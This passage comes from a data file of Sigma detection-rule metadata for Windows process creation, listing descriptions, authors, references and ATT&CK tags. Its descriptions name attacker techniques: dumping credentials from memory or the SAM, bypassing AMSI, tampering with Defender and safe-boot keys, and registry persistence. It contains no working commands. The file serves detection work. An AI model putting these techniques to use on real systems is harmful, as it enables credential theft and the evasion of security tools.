- "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory",
- "meta": {
- "author": "Florian Roth, Nasreddine Bencherchali",
- "creation_date": "2022/01/04",
- "falsepositive": [
- "Command lines that use the same flags"
- ],
- "filename": "proc_creation_win_proc_dump_createdump.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/",
- "https://twitter.com/bopin2020/status/1366400799199272960",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1036",
- "attack.t1003.001"
- ]
- },
- "uuid": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48",
- "value": "CreateDump Process Dump"
- },
- {
- "description": "Detects the use of a Visual Studio bundled tool named DumpMinitool.exe",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/04/06",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_proc_dump_dumpminitool.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/mrd0x/status/1511415432888131586?s=20&t=DvVrzeZ1OcGiWowbhPV8Lg",
- "https://twitter.com/mrd0x/status/1511489821247684615",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_dumpminitool.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1036",
- "attack.t1003.001"
- ]
- },
- "uuid": "dee0a7a3-f200-4112-a99b-952196d81e42",
- "value": "DumpMinitool Usage"
- },
- {
- "description": "Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory",
- "meta": {
- "author": "Florian Roth",
- "creation_date": 
"2022/01/04", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_proc_dump_rdrleakdiag.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" - ] - }, - "uuid": "6355a919-2e97-4285-a673-74645566340d", - "value": "RdrLeakDiag Process Dump" - }, - { - "description": "Detects suspicious ways to use of a Visual Studio bundled tool named DumpMinitool.exe", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/04/06", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_proc_dump_susp_dumpminitool.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/mrd0x/status/1511415432888131586", - "https://twitter.com/mrd0x/status/1511489821247684615", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_susp_dumpminitool.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" - ] - }, - "uuid": "eb1c4225-1c23-4241-8dd4-051389fde4ce", - "value": "Suspicious DumpMinitool Usage" - }, - { - "description": "Detect suspicious parent processes of well-known Windows processes", - "meta": { - "author": "vburov", - "creation_date": "2019/02/23", - "falsepositive": [ - "Some security products seem to spawn these" - ], - "filename": "proc_creation_win_proc_wrong_parent.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", - 
"https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/", - "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf", - "https://attack.mitre.org/techniques/T1036/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_wrong_parent.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.003", - "attack.t1036.005" - ] - }, - "uuid": "96036718-71cc-4027-a538-d1587e0006a7", - "value": "Windows Processes Suspicious Parent Directory" - }, - { - "description": "Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file.", - "meta": { - "author": "frack113", - "creation_date": "2021/07/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_protocolhandler_susp_file.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_protocolhandler_susp_file.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", - "value": "ProtocolHandler.exe Downloaded Suspicious File" - }, - { - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth, Sreeman, FPT.EagleEye Team", - "creation_date": "2020/10/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_proxy_execution_wuauclt.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://dtm.uk/wuauclt/", - 
"https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proxy_execution_wuauclt.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" - ] - }, - "uuid": "af77cf95-c469-471c-b6a0-946c685c4798", - "value": "Proxy Execution via Wuauclt" - }, - { - "description": "Detects a PsExec service start", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/03/13", - "falsepositive": [ - "Administrative activity" - ], - "filename": "proc_creation_win_psexesvc_start.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psexesvc_start.yml" - ], - "tags": [ - "attack.execution", - "attack.s0029", - "attack.t1569.002" - ] - }, - "uuid": "3ede524d-21cc-472d-a3ce-d21b568d8db7", - "value": "PsExec Service Start" - }, - { - "description": "Detects attempts to disable AMSI in the command line. 
It is possible to bypass AMSI by disabling it before loading the main payload.",
- "meta": {
- "author": "@Kostastsale",
- "creation_date": "2022/11/04",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_psh_amsi_bypass_pattern_nov22.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psh_amsi_bypass_pattern_nov22.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.001",
- "attack.execution"
- ]
- },
- "uuid": "4f927692-68b5-4267-871b-073c45f4f6fe",
- "value": "PowerShell AMSI Bypass Pattern"
- },
- {
- "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/08/30",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_pua_defendercheck.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/matterpreter/DefenderCheck",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_defendercheck.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1027.005"
- ]
- },
- "uuid": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7",
- "value": "DefenderCheck Usage"
- },
- {
- "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/10/18",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_pua_seatbelt.yml",
- "level": "high",
- "logsource.category": 
"process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/GhostPack/Seatbelt", - "https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1526", - "attack.t1087", - "attack.t1083" - ] - }, - "uuid": "38646daa-e78f-4ace-9de0-55547b2d30da", - "value": "Seatbelt PUA Tool" - }, - { - "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/25", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_public_folder_parent.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/blackbyte-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_public_folder_parent.yml" - ], - "tags": "No established tags" - }, - "uuid": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", - "value": "Parent in Public Folder Suspicious Process" - }, - { - "description": "Detects the execution of the PurpleSharp adversary simulation tool", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/06/18", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_purplesharp_indicators.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/mvelazc0/PurpleSharp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_purplesharp_indicators.yml" - ], - "tags": [ - "attack.t1587", - "attack.resource_development" - ] - }, - "uuid": "ff23ffbc-3378-435e-992f-0624dcf93ab4", - "value": "PurpleSharp Indicator" - }, - { - "description": "Adversaries may attempt to extract 
credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/01/05",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_pypykatz.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/skelsec/pypykatz",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pypykatz.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.002"
- ]
- },
- "uuid": "a29808fd-ef50-49ff-9c7a-59a9b040b404",
- "value": "Registry Parse with Pypykatz"
- },
- {
- "description": "Detects python spawning a pretty tty",
- "meta": {
- "author": "Nextron Systems",
- "creation_date": "2022/06/03",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_python_pty_spawn.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_pty_spawn.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059"
- ]
- },
- "uuid": "480e7e51-e797-47e3-8d72-ebfce65b6d8d",
- "value": "Python Spawning Pretty TTY on Windows"
- },
- {
- "description": "Detects usage of the Quarks PwDump tool via commandline arguments",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/09/05",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_quarks_pwdump.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- 
"https://github.com/quarkslab/quarkspwdump", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_quarks_pwdump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ] - }, - "uuid": "0685b176-c816-4837-8e7b-1216f346636b", - "value": "Quarks PwDump Usage" - }, - { - "description": "Adversaries may interact with the Windows Registry to gather information about credentials, the system, configuration, and installed software.", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2019/10/21", - "falsepositive": "No established falsepositives", - "filename": "proc_creation_win_query_registry.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_query_registry.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1012", - "attack.t1007" - ] - }, - "uuid": "970007b7-ce32-49d0-a4a4-fbef016950bd", - "value": "Query Registry" - }, - { - "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_query_session_exfil.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/MichalKoczwara/status/1553634816016498688", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_query_session_exfil.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": 
"53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", - "value": "Query Usage To Exfil Data" - }, - { - "description": "This command line patterns found in BlackByte Ransomware operations", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/25", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_ransom_blackbyte.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/blackbyte-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ransom_blackbyte.yml" - ], - "tags": "No established tags" - }, - "uuid": "999e8307-a775-4d5f-addc-4855632335be", - "value": "BlackByte Ransomware Patterns" - }, - { - "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/28", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_raspberry_robin_single_dot_ending_file.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_raspberry_robin_single_dot_ending_file.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", - "value": "Raspberry Robin Dot Ending File" - }, - { - "description": "Detects RDP session hijacking by using MSTSC shadowing", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/01/24", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_rdp_hijack_shadowing.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", 
- "refs": [ - "https://twitter.com/kmkz_security/status/1220694202301976576", - "https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rdp_hijack_shadowing.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1563.002" - ] - }, - "uuid": "6ba5a05f-b095-4f0a-8654-b825f4f16334", - "value": "MSTSC Shadowing" - }, - { - "description": "Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/16", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_redirect_local_admin_share.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/", - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml" - ], - "tags": "No established tags" - }, - "uuid": "ab9e3b40-0c85-4ba1-aede-455d226fd124", - "value": "Suspicious Redirection to Local Admin Share" - }, - { - "description": "Detects the redirection of an alternate data stream (ADS) of / within a Windows command line session", - "meta": { - "author": "frack113", - "creation_date": "2022/02/04", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_redirect_to_stream.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md#atomic-test-3---create-ads-command-prompt", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redirect_to_stream.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ] - }, - "uuid": "70e68156-6571-427b-a6e9-4476a173a9b6", - "value": "Cmd Stream Redirection" - }, - { - "description": "Detects actions caused by the RedMimicry Winnti playbook", - "meta": { - "author": "Alexander Rausch", - "creation_date": "2020/06/24", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_redmimicry_winnti_proc.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redmimicry.com", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redmimicry_winnti_proc.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1106", - "attack.t1059.003", - "attack.t1218.011" - ] - }, - "uuid": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", - "value": "RedMimicry Winnti Playbook Execute" - }, - { - "description": "Detects the export of a crital Registry key to a file.", - "meta": { - "author": "Oddvar Moe, Sander Wiebing, oscd.community", - "creation_date": "2020/10/12", - "falsepositive": [ - "Dumping hives for legitimate purpouse i.e. 
backup or forensic investigation"
- ],
- "filename": "proc_creation_win_regedit_export_critical_keys.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
- "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml"
- ],
- "tags": [
- "attack.exfiltration",
- "attack.t1012"
- ]
- },
- "uuid": "82880171-b475-4201-b811-e9c826cd5eaa",
- "value": "Exports Critical Registry Keys To a File"
- },
- {
- "description": "Detects the export of the target Registry key to a file.",
- "meta": {
- "author": "Oddvar Moe, Sander Wiebing, oscd.community",
- "creation_date": "2020/10/07",
- "falsepositive": [
- "Legitimate export of keys"
- ],
- "filename": "proc_creation_win_regedit_export_keys.yml",
- "level": "low",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
- "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml"
- ],
- "tags": [
- "attack.exfiltration",
- "attack.t1012"
- ]
- },
- "uuid": "f0e53e89-8d22-46ea-9db5-9d4796ee2f8a",
- "value": "Exports Registry Key To a File"
- },
- {
- "description": "Detects the import of the specified file to the registry with regedit.exe.",
- "meta": {
- "author": "Oddvar Moe, Sander Wiebing, oscd.community",
- "creation_date": "2020/10/07",
- "falsepositive": [
- "Legitimate import of keys",
- "Evernote"
- ],
- "filename": "proc_creation_win_regedit_import_keys.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
- 
"https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml" - ], - "tags": [ - "attack.t1112", - "attack.defense_evasion" - ] - }, - "uuid": "73bba97f-a82d-42ce-b315-9182e76c57b1", - "value": "Imports Registry Key From a File" - }, - { - "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", - "meta": { - "author": "Oddvar Moe, Sander Wiebing, oscd.community", - "creation_date": "2020/10/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_regedit_import_keys_ads.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml" - ], - "tags": [ - "attack.t1112", - "attack.defense_evasion" - ] - }, - "uuid": "0b80ade5-6997-4b1d-99a1-71701778ea61", - "value": "Imports Registry Key From an ADS" - }, - { - "description": "Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.", - "meta": { - "author": "Eli Salem, Sander Wiebing, oscd.community", - "creation_date": "2020/10/08", - "falsepositive": [ - "Legitimate modification of keys" - ], - "filename": "proc_creation_win_regini.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regini/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini.yml" - ], - "tags": [ - "attack.t1112", - "attack.defense_evasion" - ] - }, - "uuid": "5f60740a-f57b-4e76-82a1-15b6ff2cb134", - "value": "Modifies the Registry From a File" - }, - { - "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", - "meta": { - "author": "Eli Salem, Sander Wiebing, oscd.community", - "creation_date": "2020/10/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_regini_ads.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regini/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_ads.yml" - ], - "tags": [ - "attack.t1112", - "attack.defense_evasion" - ] - }, - "uuid": "77946e79-97f1-45a2-84b4-f37b5c0d8682", - "value": "Modifies the Registry From a ADS" - }, - { - "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/06/28", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", - "Legitimate administrator sets up autorun keys for legitimate reasons.", - "Discord" - ], - "filename": "proc_creation_win_reg_add_run_key.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/", - "https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1547.001"
- ]
- },
- "uuid": "de587dce-915e-4218-aac4-835ca6af6f70",
- "value": "Reg Add RUN Key"
- },
- {
- "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/09/02",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_reg_add_safeboot.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.001"
- ]
- },
- "uuid": "d7662ff6-9e97-4596-a61d-9839e32dee8d",
- "value": "Add SafeBoot Keys Via Reg Utility"
- },
- {
- "description": "Qbot used reg.exe to add Defender folder exceptions for folders within AppData and ProgramData.",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/02/13",
- "falsepositive": [
- "Legitimate use"
- ],
- "filename": "proc_creation_win_reg_defender_exclusion.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/",
- "https://redcanary.com/threat-detection-report/threats/qbot/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_exclusion.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.001"
- ]
- },
- "uuid": "48917adc-a28e-4f5d-b729-11e75da8941f",
- "value": "Registry Defender Exclusions"
- },
- {
- "description": "Detects reg command lines that disable certain important features of Microsoft Defender",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/03/22",
- "falsepositive": [
- "Rare legitimate use by administrators to test software (should always be investigated)"
- ],
- "filename": "proc_creation_win_reg_defender_tampering.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/",
- "https://github.com/swagkarna/Defeat-Defender-V1.2.0",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_tampering.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.001"
- ]
- },
- "uuid": "452bce90-6fb0-43cc-97a5-affc283139b3",
- "value": "Registry Defender Tampering"
- },
- {
- "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products",
- "meta": {
- "author": "Nasreddine Bencherchali, Tim Shelton",
- "creation_date": "2022/08/08",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_reg_delete_safeboot.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_delete_safeboot.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.001"
- ]
- },
- "uuid": "fc0e89b5-adb0-43c1-b749-c12a10ec37de",
- "value": "Delete SafeBoot Keys Via Reg Utility"
- },
- {
- "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/08/01",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_reg_delete_services.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_delete_services.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.001"
- ]
- },
- "uuid": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5",
- "value": "Delete Services Via Reg Utility"
- },
- {
- "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/01/05",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_reg_dump_sam.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_dump_sam.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.002"
- ]
- },
- "uuid": "038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e",
- "value": "Registry Dump of SAM Creds and Secrets"
- },
- {
- "description": "Detects the execution of reg.exe and subsequent command line arguments for enabling RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' subkeys",
- "meta": {
- "author": "@Kostastsale, @TheDFIRReport, slightly modified by pH-T",
- "creation_date": "2022/02/12",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_reg_enable_rdp.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
